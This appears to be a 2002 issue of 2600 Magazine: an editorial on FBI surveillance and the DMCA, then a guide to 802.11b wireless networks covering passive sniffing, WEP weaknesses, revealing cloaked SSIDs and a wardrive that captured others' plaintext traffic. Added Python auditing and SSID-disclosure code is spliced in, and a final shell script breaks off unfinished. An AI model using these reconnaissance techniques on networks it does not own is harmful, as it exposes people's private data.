"People who go to places of worship, people who go to libraries, people who are in chat rooms, are going to have 'Big Brother' listening in even though there's no evidence that they are involved in anything illegal whatsoever." - Laura Murphy, spokeswoman for the American Civil Liberties Union, on the new surveillance powers given to the FBI
Editor-In-Chief
Emmanuel Goldstein
Layout and Design
ShapeShifter
Cover Concept and Photo
Dragorn, Porkchop
Cover Design
Mike Essl
Office Manager
Tampruf
Writers: Bernie S., Billsf, Eric Corley,
Dalai, John Drake, Paul Estev, Mr.
French, Javaman, Joe630, Kingpin,
Lucky225, Kevin Mitnick, mlc,
The Prophet, David Ruderman, Seraf,
Silent Switchman, Scott Skinner,
Mr. Upsetter
Webmaster: Dominick LaTrappe
Web Assistance: Juintz, Kerry
Network Operations: CSS
Broadcast Coordinators: Juintz,
Pete, daRonin, Digital Mercenary,
Monarch, w3rd, Gehenna
IRC Admins: Antipent, Autojack,
DaRonin, Digital Mercenary,
Porkchop, Roadie
Inspirational Music: Doe Maar,
Psychic TV, The Saints, Alice in
Chains, Yoko Ono, Chumbawamba
Shout Outs: rms, Hope Cordes,
Kyoske, Patrick, Christopher
Bollman, Mark Hosler, Uzi Nissan,
Rustu Recber
RIP: Jack Biello
2600 (ISSN 0749-3851) is published
quarterly by 2600 Enterprises Inc.
7 Strong's Lane, Setauket, NY 11733.
Second class postage permit paid at
Setauket, New York.
POSTMASTER:
Send address changes to
2600, P.O. Box 752, Middle Island,
NY 11953-0752.
Copyright (c) 2002
2600 Enterprises, Inc.
Yearly subscription: U.S. and Canada -
$18 individual,
$50 corporate (U.S. funds).
Overseas - $26 individual,
$65 corporate.
Back issues available for 1984-2001 at
$20 per year,
$25 per year overseas.
Individual issues available from 1988 on
at $5 each, $6.25 each overseas.
ADDRESS ALL SUBSCRIPTION
CORRESPONDENCE TO:
2600 Subscription Dept., P.O. Box 752,
Middle Island, NY 11953-0752
(subs@2600.com).
FOR LETTERS AND ARTICLE
SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99, Middle
Island, NY 11953-0099
(letters@2600.com, articles@2600.com).
2600 Office Line: 631-751-2600
2600 FAX Line: 631-474-2677
We've reached a critical stage on so many different fronts that it's hard to imagine they're not all somehow intertwined. We shouldn't doubt our ability to influence change in whatever forum the battle we choose is being waged. This is the time to speak up.

Recent changes in the way our government works seem to no longer be about terrorism - if they ever were in the first place. As freedoms disappear and power becomes more centralized, a greater number of people are beginning to realize that we're moving into some very dangerous ground.

The "reorganization" of the FBI on May 29 was enough to shock a lot of us into paying attention. Now, all of a sudden, we no longer have an agency whose sole purpose is to investigate crimes. Their new reason for being is to prevent the crimes in the first place. Splendid, you might say. Anything that helps to stop crime has got to be a good thing, right? This is precisely what you're supposed to say. However, if you take an extra few minutes and think it through, you may come to the conclusion that this solution may indeed be a worse crime itself.

Let's look at what we're now facing. For the moment we'll confine it to the online world and the hacker culture. The FBI now no longer has to have any evidence of a crime being committed or even planned. They can wander onto IRC or an AOL chatroom and simply capture everything and then, at their leisure, look for things they don't like. The users responsible will then face a full investigation - all on the basis of words spoken in a public forum. The potential for targeting of certain individuals or even groups for prosecution is now in the stratosphere. People attending 2600 meetings will be subject to the same kind of scrutiny. Agents may now attempt to infiltrate organizations even when there is no sign of any criminal activity - just to keep an eye on things. If this doesn't make alarm bells go off in your head, there's probably not much we can say to make you see the distinct threat we're now all facing.

How much does this really have to do with hackers? Isn't this all about capturing terrorists and stopping really bad people from doing really bad things? That's what it was supposed to be. But clearly these goals have been subverted. According to a Fox News report on May 30, 2002: "The FBI's top new marching orders will focus on terrorists, spies, and hackers, in that order." Granted, this is Fox News and they're liable to interpret anything from credit card fraud to online pornography as a derivation of computer hacking. The feds themselves refer to their new focus as "counterterrorism, counterintelligence, and cyber investigations." But the latter category in particular is so nebulous that literally anything that someone involved in computers might be doing would be open to scrutiny. And therein comes the proverbial chilling effect.

Not convinced yet? The FBI now can check various commercial databases and see what videos you've been renting, what books or magazines you're reading, what's popping up on your credit card bills, where you're traveling to, etc. Even your medical records won't be safe from their prying eyes. And all without any evidence that you've done anything wrong! In fact, approval from FBI headquarters is no longer even needed. Your local field office can do this on their own if they feel like it. And those who doubt that federal agents would abuse the power they hold need only look back at the Bernie S. case of the mid 90's.

In other countries government agents routinely infiltrate law-abiding groups of people who disagree with government policy. They then succeed in disrupting and dividing the group, at times even pushing them into illegal situations that never would have happened otherwise. And that gives the authorities carte blanche to move in. (In the United States we saw this occur decades ago with the FBI's counterintelligence program - dubbed COINTELPRO. Innocent people involved in the civil rights, antiwar, and countercultural movements were spied upon and harassed by these agents until such conduct was outlawed in the 70's.) Now this KGB style of dealing with dissidents, misfits, and individual thinkers has come back home wrapped in a flag. We can only wonder how many innocent people will be caught up in its wake.

It's an awfully odd coincidence that word of the FBI's apparent bungling of an investigation that might have detected the September 11 plot came literally days before the largest such reorganization in our nation's history. That story managed to convince a number of people that change was needed. But the subsequent events managed to also slap a few faces out of their deep sleep of apathy and blind acceptance.

2600 Magazine

The fear now of course is that any resistance will be too little too late. But it doesn't have to be that way.

When we were sued two years ago by the motion picture industry, it caught a lot of us by surprise. The Digital Millennium Copyright Act was already law. What chance did we have to fight its existence? Was it not also too little too late?

We don't think it was. Nor do the thousands of people who supported us through the entire ordeal. And as we look around today, we realize that we have become so much stronger and more unified as a result of the action taken against us. We lost the case. And we lost the appeal. And, after considerable consultation, soul searching, and debate, we believe it's time to change the focus of this fight.

We wanted to take this all the way to the Supreme Court. But, as legal experts who know considerably more about the system than we do emphasized, there was an infinitesimal chance that they would even agree to hear the case and even less of a likelihood that we would win if they did. Both rejections ran the risk of setting the clock back as far as legal precedent went and this, quite frankly, is not the time to lose even more ground.

But, painful as this decision was to reach, we've come out of it learning something important. We've won. Maybe we weren't victorious in court but that doesn't exactly tell the whole story. Look around you. People have become aware of the evils of the DMCA. When this first started years ago, so few people knew anything about it - that's how it became law in the first place. But now it seems to be on everyone's minds as it becomes every bit as pervasive as we knew it would.

Summer 2002

The industries that embrace the DMCA have fallen into disrepute with the general public as their true motives of sheer greed become more and more obvious. The recent attempt to charge fees for Internet broadcasting in the name of the DMCA outraged a whole new crowd of people. The efforts by the recording and motion picture industries to control and eventually bury any aspect of fair use by consumers has backfired horribly. People are realizing that such new (and mandatory) innovations as digital television will give them less freedom and flexibility if they don't challenge these laws. Attempts to control copying of CDs have ranged from the absurd to the criminal. It was recently discovered that simply using a magic marker to write over a certain section of a "copy-protected" CD was enough to defeat the entire system, leading many to wonder if magic markers were now illegal access devices under the DMCA. And Macintosh users were horrified to discover that inserting one of these CDs into their machines would often cause actual damage to the machine! In fact, Philips, the company that invented the CD, says that these things don't even meet the definition of a CD and should not be sold as such. We encourage people who find these products in the CD section of a store to separate them to avoid confusion and false advertising, not to mention possible costly repairs for people who unknowingly try to play these things in their computers.

We'd like to say that our early battle with the DMCA was what started to wake people up. But it wouldn't be fair to those people who really did that job - the MPAA, the RIAA, and all of the other corporate and government colluders who joined forces to establish a stranglehold on the technology and dupe the public. Once their true colors became known, it was a foregone conclusion that they would begin to self-destruct in an expanding cloud of greed.

With the ominous changes in federal agencies, we are looked upon by many as little better than terrorists. Warped though that perception may be, we have to face the fact that this will overshadow the actual merits of our case. After all, when the MPAA started this whole thing, they chose us as the people they wanted to sue even though there were hundreds of others they could have gone after. Their reasoning was that as hackers, we would be summarily dismissed in the courts. Unfortunately, that proved to be true. But they most certainly didn't count on the massive rallying of support that came our way. It took courage and it took intelligence for individuals to stand up against what they knew was wrong. And now, unlike in 2000, the DMCA is being challenged on many fronts, not just ours.

So, while the stage may be shifting, the fight will intensify and see many more participants. We will not shy away from any of this nor lose sight of the ultimate objective, which is to repeal this horrible law once and for all and restore the right of fair use and free speech to the public.

It just got a lot harder with all the domestic spying, branding of hackers as terrorists, etc. But intensified pressure often in turn makes a battle all the more intense. While more seems to be at stake than ever before, we've never felt so far from defeat as we do now.
The Comprehensive Guide to 802.11b Wireless Networks
by Dragorn

Wireless networking has been around for decades (fixed microwave links, laser links, ham packet radio), but Wireless Ethernet, aka WiFi (short for "wireless fidelity"), aka 802.11b, has recently exploded in popularity for home and office use. As is too often the case with any new, widely adopted technology, the average consumer has little understanding of the impact of the little box with antennas that they just hooked up to their cable modem or that their office manager just told them to install on the network.
802.11b Background and Basics

802.11b is part of the 802.11 wireless family (which includes 802.11a and 802.11g; however, neither is as widely used as 802.11b). Operating in the 2.4 GHz unlicensed radio band, 802.11b is designed to offer up to 11 Mbit (closer to 6 Mbit usable) over short distances (typically less than 1500 feet), but with custom antennas and a clear line of sight, links of several miles are possible. Because it operates in the unlicensed band, no single corporation controls the airwaves. Unfortunately, this also means there is a lot of garbage floating in the 2.4 GHz range of the spectrum along with the wireless data. Many cordless phones operate on the same frequency, and household microwaves leak significant noise into the 2.4 GHz range. Some wireless camera equipment (X10) uses the 2.4 GHz range as well. WLANs also recently faced the threat of severely restricted transmission power due to a petition by Sirius satellite radio; however, the complaint was recently withdrawn by the company.

802.11b operates in two modes - infrastructure, where dedicated access points (APs) act as the central points for a large number of clients, and ad-hoc, where each client talks directly to other clients. In infrastructure mode, each client needs only to be able to see the AP (or another AP in the same distribution system) - two clients need not see each other directly because the AP will relay traffic. In ad-hoc, every client must be in range of every other client. In either operational mode, it is, by definition, a shared media network - everyone can see all the traffic in the air or, at least, all the traffic in the air that they are in range of.

Each 802.11b network is given a Service Set Identifier, or SSID. This is the name of the network, which all clients use to identify which network they are communicating with. Networks operate on one of 12 (in the US) or 14 (international) channels. Most wireless setups will automatically select the best signal out of all the network points sharing the same SSID.

802.11b has link-layer encryption called Wired Equivalence Protection, or WEP. WEP uses RC4 in 40, 64, 128, or, on some recent cards, 256 bit encryption. While never designed to provide a tremendous amount of security (wired equivalence implying "as secure as a shared media wired network," which, as anyone running a sniffer on a wired shared media network can tell you, isn't very secure), additional flaws have been found in WEP which allow key attacks against data encrypted by many manufacturers' equipment. More on this later.
[Screenshot: Kismet "Networks (Autofit)" view listing detected networks by Name, Type, WEP, Channel, Data and Weak packet counts, with a status pane reporting each newly found network (BSSID, WEP flag, channel, rate), a GPS position line, and a battery indicator.]
802.11b Packet Types

The most common types of 802.11b packets are:

1. Beacon packets. Typically, access points continually transmit beacon packets containing their SSID, maximum transfer rate, and the MAC address of the access point. Most APs send between six and ten beacon packets a second, continually.
2. Probe packets. When a client tries to join a network it sends a probe request packet containing the SSID of the network it wishes to join. If an access point allows the client to associate with the network, it responds with a probe response, also containing the SSID.
3. Data packets. Typically, these are just TCP/IP encapsulated in the 802.11 frames.
4. Ad-hoc packets. These are no different than data packets except they are sent card to card instead of through an access point.
Detecting 802.11b Networks

There are two primary methods for detecting wireless networks, utilized by different programs.

1. Active detection, where the client transmits probe requests and looks for networks that respond to them.
Positive: Sometimes able to detect cloaked networks; does not require a card or driver capable of RF Monitor support.
Negative: Requires the client to be within transmit range of the access point for it to be detected, generates traffic on the target network which can be traced, and lies on questionable legal ground so far as actively joining a network is concerned.
Used by: NetStumbler (www.netstumbler.com, Windows).

2. Passive detection, where the client listens to all wireless traffic in the air and extracts information from the packets found.
Positive: Client needs only to be within receive range to detect a network; no traffic is generated which can be observed. Passive sniffers are also capable of recording data packets for additional dissection.
Negative: Requires a card and driver capable of RF Monitor support, which enables raw packet detection. Cannot detect a non-beaconing network with no data traffic.
Used by: Kismet (www.kismetwireless.net, Linux/BSD), Wellenreiter (www.remote-exploit.org, Linux), Airsnort (airsnort.shmoo.com, Linux), and others.

Using passive sniffing it is essentially impossible to detect someone monitoring your network. No traffic is generated by the sniffer and, even in "secure" environments, a handheld such as the iPaq or Zaurus is more than capable of capturing traffic and can easily be kept in a jacket pocket or bag.
[Screenshot: Kismet network detail popup for the SSID nycwireless.net: Type Access Point, Channel 11, WEP No, Max Rate 11.0, Beacon 100 (0.102400 sec), Packets 20, Data 0, first seen Sat Jun 8.]
Passive monitoring of wireless data opens many advantages for tracking and analyzing networks. The level of monitoring possible varies depending on the type of card used. Cisco cards use a very fast hardware channel hopping method, which allows them to scan all of the channels transparently. Prism2 cards must do channel hopping to detect all the 802.11b channels, spending a small amount of time on each channel - most wireless sniffers include this capability either internally or as a helper application (Kismet uses "prism2_hopper" to hop three channels per second).

The most simplistic information is in the 802.11b headers - the MAC of the source, destination, and access point systems, the direction of communication, the channel, SSID, WEP, and supported transfer rates. Cisco access points even include an extra status field that often contains information about the function of the equipment, and sometimes even the location of the wireless access point.

Far more information can be gathered by dissecting the data packets of unencrypted networks - FTP, telnet, HTTP, POP, and IMAP traffic are all as vulnerable to observation as they would be in an unswitched ethernet network. ARP, UDP, and especially DHCP can be used to detect the IP ranges used by the network.

Basic sniffing can be done with almost any wireless card, but some are better than others. Most consumer wireless cards are underpowered, only capable of detecting strong signals, and don't support external antennas. Orinoco cards are more powerful than most, and support antennas; however, it is not always possible to do full RFMon mode, which is required for passive monitoring (there are patches to the Linux Orinoco drivers but they only work on some firmware versions). While not perfect, one of the best cards for general sniffing is the Cisco AIR-LMC350, which has dual antenna jacks, 100 mW transmit, and -95 dBm sensitivity (compared to 20-30 mW transmit for most Prism2 cards and -80 dBm sensitivity). As mentioned before, the Cisco chipset uses a very fast internal channel hopping scheme, which can sometimes result in missed packets if a single channel is saturated, but overall the performance of the card is excellent. It can be obtained through online retailers for approximately $110 US.

Equally important is a proper antenna - remember that a car is just a big metal box, and metal boxes are not good for radio signals. A car mounted antenna, while not absolutely necessary, will often triple the amount of data received. 5 dB gain magnetic-mount antennas can usually be found for $60 US.
The Myth (and Truth) of WEP, SSID Cloaking, and Non-Beaconing

WEP is alternately touted as the only protection you'll ever need, and so weak it's not worth enabling. The truth lies, as always, somewhere in the middle - all, or nearly all, modern chipsets include workarounds for the flaws in WEP key generation; however, all it takes is a single older system on your network (access point or client) to expose the key.
[Screenshot: Kismet statistics pane (Networks 202, Encrypted 61, Default 32) with a per-channel packet count table and a status pane, followed by a battery indicator.]
WEP only encrypts data packets - link layer packets such as joining, beaconing, probes, etc. are left unencrypted. Actually cracking the WEP key depends on the key length, the number of flawed systems generating traffic, and the traffic levels on the network - if there are no systems generating data traffic, you will never have the opportunity to capture weak keys. The most important factor is time - typically only one or two in thousands of packets contains a weak key, and current key attacks require thousands of weak keys to extract the full key.

Various dictionary-based brute force attacks are under development, but will of course have the same weakness as any brute force attack - beyond the expected range of likely keys it becomes time consuming number crunching.
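As an added example in Python (not code from the article, from Kismet or from AirSnort), here is the "weak key" count that the Weak column in the article's screenshots tallies, turned into an audit of your own stations: it parses WEP-protected data frames, classifies each RC4 IV against the Fluhrer, Mantin and Shamir weak class (first byte A+3 for some key byte index A, second byte 0xFF), and reports which transmitters are still emitting such IVs, i.e. which ones lack weak-IV avoidance and are the "single older system" the article warns about. Frames are assumed to arrive as raw 802.11 without a capture header; the BSSID, station MACs and IVs are constructed.

```python
"""Weak-IV audit for WEP-protected data frames.  Added example: not code from
the article, Kismet or AirSnort.  Counts, per transmitting station, how many
captured data frames use an RC4 IV of the form (A+3, 255, X) for A in
0..key_bytes-1, the class Fluhrer, Mantin and Shamir showed leaks key bytes.
A station that still emits them has no weak-IV avoidance in its firmware.
Frames are constructed; a real capture would come from an RF Monitor card."""
from typing import Dict, Iterable, List, Optional, Tuple

# WEP key length in bytes, excluding the 24-bit IV: "64-bit" WEP = 5, "128-bit" = 13.
KEY_BYTES_128 = 13


def parse_wep_iv(frame: bytes) -> Optional[Tuple[str, bytes]]:
    """Return (transmitter MAC, 3-byte IV) for a WEP-protected data frame, else None."""
    if len(frame) < 28:
        return None
    fc0, fc1 = frame[0], frame[1]
    if fc0 & 0x0C != 0x08 or not fc1 & 0x40:   # type 2 = data; bit 6 = Protected
        return None
    if fc1 & 0x03 == 0x03:                      # 4-address WDS frames: not handled here
        return None
    hdr_len = 24 + (2 if fc0 & 0x80 else 0)     # QoS data subtypes carry 2 extra bytes
    if len(frame) < hdr_len + 4:
        return None
    transmitter = ":".join(f"{b:02x}" for b in frame[10:16])   # addr2
    return transmitter, frame[hdr_len:hdr_len + 3]              # IV precedes key-id byte


def is_fms_weak(iv: bytes, key_bytes: int) -> bool:
    """FMS weak IV: first byte A+3 for some key byte index A, second byte 0xFF."""
    return iv[1] == 0xFF and 3 <= iv[0] < 3 + key_bytes


def audit(frames: Iterable[bytes], key_bytes: int = KEY_BYTES_128) -> Dict[str, Dict[str, int]]:
    """Per-transmitter counts of WEP data frames and of FMS-weak IVs among them."""
    stats: Dict[str, Dict[str, int]] = {}
    for frame in frames:
        parsed = parse_wep_iv(frame)
        if parsed is None:
            continue
        src, iv = parsed
        entry = stats.setdefault(src, {"data": 0, "weak": 0})
        entry["data"] += 1
        if is_fms_weak(iv, key_bytes):
            entry["weak"] += 1
    return stats


def stations_to_update(stats: Dict[str, Dict[str, int]]) -> List[str]:
    """Transmitters that emitted at least one weak IV, i.e. lack weak-IV avoidance."""
    return sorted(src for src, s in stats.items() if s["weak"] > 0)


# --- constructed sample capture (hypothetical addresses) -------------------
BSSID = bytes.fromhex("000625000001")
DEST = bytes.fromhex("00e018000009")


def build_data(src: bytes, iv: bytes, protected: bool = True) -> bytes:
    """Station-to-AP data frame (ToDS=1): addr1=BSSID, addr2=SA, addr3=DA, then IV+keyid."""
    fc = bytes([0x08, 0x41 if protected else 0x01])
    return fc + b"\x00\x00" + BSSID + src + DEST + b"\x00\x00" + iv + b"\x00" + b"\xde\xad\xbe\xef"


NEW_FW = bytes.fromhex("000c29aabb01")   # firmware with weak-IV avoidance
OLD_FW = bytes.fromhex("004096aabb02")   # older firmware, no avoidance

SAMPLE_FRAMES = [
    build_data(NEW_FW, bytes([0x10, 0x20, 0x30])),
    build_data(NEW_FW, bytes([0x03, 0xFE, 0x11])),   # second byte not 0xFF: fine
    build_data(NEW_FW, bytes([0xFF, 0xFF, 0x02])),   # first byte outside 3..15: fine
    build_data(OLD_FW, bytes([0x03, 0xFF, 0x07])),   # weak (A=0)
    build_data(OLD_FW, bytes([0x0F, 0xFF, 0x21])),   # weak for a 13-byte key (A=12), not for 5
    build_data(OLD_FW, bytes([0x10, 0xFF, 0x00])),   # A=13 is beyond a 13-byte key
    build_data(OLD_FW, bytes([0x21, 0x00, 0x00])),
    build_data(OLD_FW, bytes([0x03, 0xFF, 0x07]), protected=False),  # not WEP: ignored
    bytes([0x80, 0x00]) + b"\x00" * 30,                              # a beacon: ignored
]


def run_demo(key_bytes: int = KEY_BYTES_128) -> Dict[str, Dict[str, int]]:
    return audit(SAMPLE_FRAMES, key_bytes)


if __name__ == "__main__":
    stats = run_demo()
    for src, s in stats.items():
        print(f"{src}: {s['data']} WEP data frames, {s['weak']} weak IVs")
    print("stations needing firmware update:", stations_to_update(stats))
```

The key length matters for the classification: with the 13-byte key of "128-bit" WEP the weak first byte runs from 3 to 15, with a 5-byte key only from 3 to 7, so pass the key size your network actually uses. The transmitter address is what is reported, not the IP-level source, because the firmware that chose the IV belongs to the radio that sent the frame.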
WEP has the additional flaw of being a shared private-key encryption method. Once your key is cracked (or otherwise compromised by a system being cracked, insecure means of giving the key to personnel or other network users, an employee leaving, or even an employee losing a wireless-enabled handheld), all systems must be updated with a new WEP key, which has the same weaknesses and vulnerabilities as the previous one.

Coupled with additional security (as discussed later), WEP can be a useful deterrent; however, it is by no means sufficient as the only line of defense - while it may foil the casual sniffer, a determined attacker with the right tools stands a good chance of breaching your network.
In a further attempt to make consumer hardware more secure, or to at least appear more secure, many manufacturers include SSID "cloaking," where the SSID is blanked from the beacon packets. Unless a client knows the correct SSID, it cannot join the network. Unfortunately, this "protection" is completely transparent - once a client joins the network, the SSID is sent by the client and the AP in cleartext (even if WEP is enabled - remember, WEP only encrypts data packets, not link packets). Kismet automatically detects this exchange and fills in the network SSID. If you have users on your network, your SSID will be exposed.

Several physical attacks (of varying legality) are possible to force a cloaked network to disclose the SSID - when a card gets a weak signal or loses the signal, it attempts to rejoin the network, disclosing the SSID. Any 2.4 GHz RF interference strong enough to disrupt the network and cause systems to rejoin will, in addition to being against all FCC regulations, happily cause a disclosure of the SSID.

The second common trick favored by manufacturers to try to protect APs is to disable beaconing entirely. While not completely in accordance with the 802.11b specifications, this doesn't cause major problems for normal operation. However this, like SSID cloaking, does not provide any significant protection. Any data traveling over the network can still be seen, and the SSID is disclosed in the same fashion as the cloaked SSID by users joining the network.
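The beacon and probe mechanics from "802.11b Packet Types", the passive detection method from "Detecting 802.11b Networks", and the SSID disclosure described in the three paragraphs above, as an added example in Python that is not code from the article or from Kismet: a passive monitor that parses raw 802.11 management frames (assumed to arrive without a radiotap or Prism capture header), records each BSSID's channel and WEP flag from its beacons, marks a BSSID whose beacons carry a blank SSID as cloaked, and fills the SSID in when a probe request or probe response discloses it. All frames, MAC addresses and SSIDs are constructed.

```python
"""Passive 802.11 management-frame tracker.  Added example: not code from the
article, Kismet or any other tool it names.  Input is raw 802.11 frames as an
RF Monitor capture delivers them (assumed: no radiotap/Prism header, no FCS).
Beacons populate a per-BSSID table; a cloaked or non-beaconing SSID is filled
in from the probe request/response a joining client causes.  Samples below
are constructed."""
import struct
from dataclasses import dataclass
from typing import Dict, Optional

PROBE_REQ, PROBE_RESP, BEACON = 0x4, 0x5, 0x8   # management frame subtypes
PRIVACY = 0x0010                                 # capability bit: WEP enabled
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class Network:
    bssid: str
    ssid: Optional[str] = None         # None until some frame discloses it
    ssid_source: Optional[str] = None  # "beacon", "probe response" or "probe request"
    channel: Optional[int] = None
    wep: bool = False
    beacons: int = 0
    cloaked: bool = False              # a beacon carried a blank SSID


def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ies(buf: bytes) -> Dict[int, bytes]:
    """Walk the tagged parameters (id, length, value) that follow the fixed fields."""
    ies: Dict[int, bytes] = {}
    while len(buf) >= 2:
        eid, ln = buf[0], buf[1]
        ies[eid] = buf[2:2 + ln]
        buf = buf[2 + ln:]
    return ies


class PassiveMonitor:
    def __init__(self) -> None:
        self.networks: Dict[str, Network] = {}

    def _net(self, bssid: str) -> Network:
        return self.networks.setdefault(bssid, Network(bssid))

    def feed(self, frame: bytes) -> None:
        """Consume one raw 802.11 frame; anything but beacon/probe frames is ignored."""
        if len(frame) < 24 or frame[0] & 0x0C != 0:      # type 0 = management
            return
        subtype = frame[0] >> 4
        bssid = mac(frame[16:22])                        # addr3 in management frames
        body = frame[24:]
        if subtype == PROBE_REQ:
            # A client rejoining a cloaked network names the SSID in its request.
            ssid = parse_ies(body).get(0, b"")
            if ssid and bssid != BROADCAST:
                self._disclose(self._net(bssid), ssid, "probe request")
        elif subtype in (BEACON, PROBE_RESP) and len(body) >= 12:
            cap = struct.unpack_from("<H", body, 10)[0]  # after timestamp + interval
            ies = parse_ies(body[12:])
            net = self._net(bssid)
            net.wep = bool(cap & PRIVACY)
            if len(ies.get(3, b"")) == 1:                # DS Parameter Set = channel
                net.channel = ies[3][0]
            ssid = ies.get(0, b"")
            if subtype == BEACON:
                net.beacons += 1
                if not ssid.strip(b"\x00"):              # blank or NUL-filled: cloaked
                    net.cloaked = True
                    return
                self._disclose(net, ssid, "beacon")
            else:
                self._disclose(net, ssid, "probe response")

    @staticmethod
    def _disclose(net: Network, ssid: bytes, source: str) -> None:
        # Beacons are authoritative; other sources only fill a still-unknown SSID.
        if ssid and (net.ssid is None or source == "beacon"):
            net.ssid, net.ssid_source = ssid.decode("utf-8", "replace"), source


def build_mgmt(subtype: int, src: bytes, bssid: bytes, ssid: bytes,
               channel: Optional[int] = None, wep: bool = False) -> bytes:
    """Construct a minimal management frame (sample input only)."""
    hdr = bytes([subtype << 4, 0]) + b"\x00\x00" + b"\xff" * 6 + src + bssid + b"\x00\x00"
    body = b""
    if subtype != PROBE_REQ:   # beacon/probe response fixed fields: timestamp, interval, cap
        body += b"\x00" * 8 + struct.pack("<HH", 100, 0x0001 | (PRIVACY if wep else 0))
    body += bytes([0, len(ssid)]) + ssid
    if channel is not None:
        body += bytes([3, 1, channel])
    return hdr + body


def run_demo() -> PassiveMonitor:
    """Constructed capture: one open AP, one cloaked WEP AP that a client rejoins."""
    ap_open, ap_cloaked = bytes.fromhex("00022d000001"), bytes.fromhex("004096000002")
    client = bytes.fromhex("000c29000003")
    mon = PassiveMonitor()
    for frame in [
        build_mgmt(BEACON, ap_open, ap_open, b"nycwireless", channel=11),
        build_mgmt(BEACON, ap_cloaked, ap_cloaked, b"", channel=6, wep=True),
        build_mgmt(BEACON, ap_cloaked, ap_cloaked, b"", channel=6, wep=True),
        build_mgmt(PROBE_REQ, client, ap_cloaked, b"office"),           # client rejoins
        build_mgmt(PROBE_RESP, ap_cloaked, ap_cloaked, b"office", channel=6, wep=True),
    ]:
        mon.feed(frame)
    return mon


if __name__ == "__main__":
    for net in run_demo().networks.values():
        how = f" (cloaked, disclosed by {net.ssid_source})" if net.cloaked else ""
        print(f"{net.bssid}  ch {net.channel}  WEP {'Y' if net.wep else 'N'}  "
              f"beacons {net.beacons}  ssid {net.ssid!r}{how}")
```

Run on your own air, the cloaked WEP network comes out with its SSID labelled by the frame that disclosed it, which is the quickest way to confirm for yourself that cloaking hides nothing once a client is active. A non-beaconing AP never gets a beacon count or a cloaked flag but is still entered into the table the moment a probe exchange names it.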
[Screenshot: Kismet "Networks (Autofit)" list showing a network with <no ssid>, WEP Y, Ch 11, and a string dump window of cleartext captured from it, including NetBIOS MAILSLOT BROWSE announcements and a Cisco IOS C2900XL software version banner; a status line reports the newly found <no ssid> network.]
Securing Wireless Networks

After all of the above doom and gloom, how does one secure a wireless network? There are two primary methods that can be used, and are most effective when used in conjunction:

1. Application or network-layer encryption. This can be as simple as SSH (or an SSH-tunneled PPP virtual network) or as complex as IPSEC.
2. Proper authentication. MAC addresses can be easily spoofed. Some APs offer enhanced login authentication (Cisco LEAP). For APs that don't (most consumer equipment), solutions like NoCat (www.nocat.net) can provide secure authentication methods to protect the rest of your network from the wireless segment.
3. Properly tuned equipment. Don't assume stronger is better! Always use the minimum power possible for your network and select your antennas appropriately. Not only is it good for security, this will help reduce the congestion in the 2.4 GHz band.
[Screenshot: Kismet Packet Rate graph for the "tmobile" network (Ch 01, 815 packets), plotting packets per second over the last five minutes, with a status line reporting a newly found <no ssid> network on Ch 6 and an AC charging battery indicator.]
Community Wireless Networks

Wireless networks provide a phenomenal level of networking possibilities. Most urban areas have at least one wireless users' group aimed at building a free, community wireless network. Often called a wireless mesh or a parasitic grid, community networks aim at blanketing a city (or parts of a city) with free broadband access. Groups such as NYCWireless (www.nycwireless.net, New York City, NY), BAWIA (www.bawia.net, Boston, MA) and Personal Telco (www.personaltelco.net) have already made significant inroads into providing wireless public networks.
[Screenshot: Kismet "Networks (Autofit)" list (linksys, default, tsunami, lton123) with the Sort Network menu open (Auto-fit, Channel, First/Latest time seen, BSSID, SSID, Packet count, WEP), a GPS line (Lat 40.749, Lon -73.988, Fix 3D), and status lines reporting newly found networks and an IP range found via UDP.]
Community wireless networks offer an alternative to "big business" broadband and can often get broadband to areas unreachable by conventional means, and can provide a completely independent means of transport for free information without relying on any corporate services or resources. After September 11, the NYCWireless group was involved in bringing back connectivity to areas left without links that the large providers had not been able to restore.

While uncommon, sometimes companies (knowingly) share their wireless networks. Akamai in Boston allows public use of their wireless network equipment, which covers most of Cambridge, with minimal filtering of outgoing traffic (SSH and HTTP both work fine).

In most cases, donating a node to a community network is as simple as putting an access point on a broadband connection (cable, DSL, or other) with a public SSID and registering it with the group of your choice. The web site for a wireless group in your area should contain all the information you need to join.
Threats to 802.11b

802.11b in general and community networks specifically face several hurdles in the near future. Broadband companies are beginning to crack down on the sharing of access and on users who utilize the full bandwidth allocated to them. Connection sharing is already against the acceptable use agreements of most broadband providers, and not far away for most others, and should providers begin charging per megabyte over an arbitrary quota (as Time Warner/Road Runner is considering), free public broadband could quickly become a thing of the past.

Also, in many urban areas (and even less urban areas) the airspace available for wireless networks is becoming saturated. Just like collisions in shared-media ethernet, as more wireless networks with overlapping signals are in an area, less bandwidth is available for each. Non-802.11b devices like phones, microwaves, cameras, and even a planned microwave-based lighting system all leak noise into the air that further degrades 802.11b signals.

Finally, while the current 802.11b equipment is well understood and supported with open source drivers, manufacturers are aggressively discouraging community-developed drivers for 802.11a hardware, and in fact as of the time of this writing it is completely unsupported in Linux.
Practical Examples
To gather the data for the cover we used a Cisco card, a magmount antenna on the roof, a Garmin GPS, and Kismet. In an hour and a half, we found 448 networks. In the center of Manhattan, an area which arguably should be more security aware than anywhere else, only 26 percent of the networks had encryption enabled. At least 75 of the access points were factory configurations, with all the default access granted.

Plaintext data included searches on outpost.com, an individual with 129 email messages (every single one of them porn spam), books purchased at Barnes and Noble, IRC sessions, instant messenger conversations, browsing at the Fry's website, Windows Network Neighborhood file transfers, data from globix.net, uPnP services looking for drivers, and more.

Vulnerable networks ranged from personal systems in apartments to law firms, book stores, and news companies. At the very least they exposed all of the data handled by the company, and at the worst presented an easy entrance into the corporate network. Wireless demo units are often plugged in behind the corporate firewalls of retail stores (Office Depot for months ran a default Linksys demo unit plugged into the corporate network behind the firewall).
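The two figures above (share of networks with encryption on, and how many are still factory configurations) are the kind of thing you want scripted rather than counted by hand. The following is an added example, not code from the article or from Kismet: it assumes a simple one-network-per-line listing (SSID;BSSID;CHANNEL;ENC, a format chosen here for illustration; Kismet's own CSV/XML logs carry the same fields, so adjust the field split for your version) and uses a constructed sample with made-up BSSIDs.

```sh
#!/bin/sh
# Added example, not from the article.  Summarises a wardrive listing the
# way the cover figures were derived: share of networks with encryption on,
# and how many are open *and* still wearing a factory SSID.
# Input format is an assumption: one network per line,
#   SSID;BSSID;CHANNEL;ENC     (ENC is Y or N)

# Constructed sample (made-up BSSIDs); SSIDs are of the kind seen on the page.
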